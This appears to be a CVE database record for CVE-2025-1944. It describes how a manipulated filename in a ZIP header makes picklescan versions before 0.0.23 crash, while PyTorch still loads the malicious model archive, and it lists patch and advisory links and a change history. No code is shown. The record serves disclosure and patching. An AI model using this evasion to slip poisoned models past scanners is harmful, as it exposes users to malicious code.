picklescan before 0.0.23 is vulnerable to a ZIP archive manipulation attack that causes it to crash when attempting to extract and scan PyTorch model archives. By modifying the filename in the ZIP header while keeping the original filename in the directory listing, an attacker can make PickleScan raise a BadZipFile error. However, PyTorch's more forgiving ZIP implementation still allows the model to be loaded, enabling malicious payloads to bypass detection.
                
            References
                    | Link | Resource | 
|---|---|
| https://github.com/mmaitre314/picklescan/commit/e58e45e0d9e091159c1554f9b04828bbb40b9781 | Patch | 
| https://github.com/mmaitre314/picklescan/security/advisories/GHSA-7q5r-7gvp-wc82 | Exploit Vendor Advisory | 
| https://sites.google.com/sonatype.com/vulnerabilities/cve-2025-1944 | Exploit Third Party Advisory | 
Configurations
                    History
                    19 Mar 2025, 16:11
| Type | Values Removed | Values Added | 
|---|---|---|
| References | () https://github.com/mmaitre314/picklescan/commit/e58e45e0d9e091159c1554f9b04828bbb40b9781 - Patch | |
| References | () https://github.com/mmaitre314/picklescan/security/advisories/GHSA-7q5r-7gvp-wc82 - Exploit, Vendor Advisory | |
| References | () https://sites.google.com/sonatype.com/vulnerabilities/cve-2025-1944 - Exploit, Third Party Advisory | |
| First Time | Mmaitre314 picklescan Mmaitre314 | |
| CVSS | v2 : v3 : | v2 : unknown v3 : 6.5 | 
| Summary | 
 | |
| CWE | NVD-CWE-noinfo | |
| CPE | cpe:2.3:a:mmaitre314:picklescan:*:*:*:*:*:*:*:* | 
10 Mar 2025, 12:15
| Type | Values Removed | Values Added | 
|---|---|---|
| New CVE | 
Information
                Published : 2025-03-10 12:15
Updated : 2025-03-19 16:11
NVD link : CVE-2025-1944
Mitre link : CVE-2025-1944
CVE.ORG link : CVE-2025-1944
JSON object : View
Products Affected
                mmaitre314
- picklescan
CWE
                